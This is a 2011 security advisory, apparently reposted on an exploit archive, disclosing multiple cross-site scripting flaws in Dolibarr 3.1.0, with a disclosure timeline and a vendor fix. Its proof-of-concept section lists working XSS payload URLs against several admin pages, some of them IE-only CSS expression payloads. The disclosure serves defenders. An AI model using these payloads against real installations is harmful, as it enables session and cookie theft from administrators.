Dolibarr 3.1.0 Cross Site Scripting

Dolibarr 3.1.0 Cross Site Scripting: Posted Nov 9, 2011; Authored by Stefan Schurtz; Dolibarr version 3.1.0 suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 73f62c78744b3f8b4d9c6c84e33979de78be6f662baa3b6b6eae31a30ae282d3; Download | Favorite | View

Dolibarr 3.1.0 Cross Site Scripting

Advisory:        Multiple Cross-Site-Scripting vulnerabilities in
Dolibarr 3.1.0
Advisory ID:     INFOSERVE-ADV2011-03
Author:          Stefan Schurtz
Contact:      security@infoserve.de
Affected Software:    Successfully tested on Dolibarr 3.1.0 other versions
may also be affected
Vendor URL:            http://www.dolibarr.org/
Vendor Status:         fixed in the 3.1 branch

==========================
Vulnerability Description
==========================

Dolibarr 3.1.0 is prone to multiple XSS vulnerability

==================
PoC-Exploit
==================

Cross-Site-Scripting - parameter 'username'

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/"
stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution:
=========

Fixed in the 3.1 branch

====================
Disclosure Timeline:
====================

08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
09-Nov-2011 - release date of this security advisory

========
Credits:
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References:
===========

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4
207e78a1
http://www.dolibarr.org/

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schurtz@infoserve.de |
www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Dolibarr 3.1.0 Cross Site Scripting

Dolibarr 3.1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dolibarr 3.1.0 Cross Site Scripting

Share This

Dolibarr 3.1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems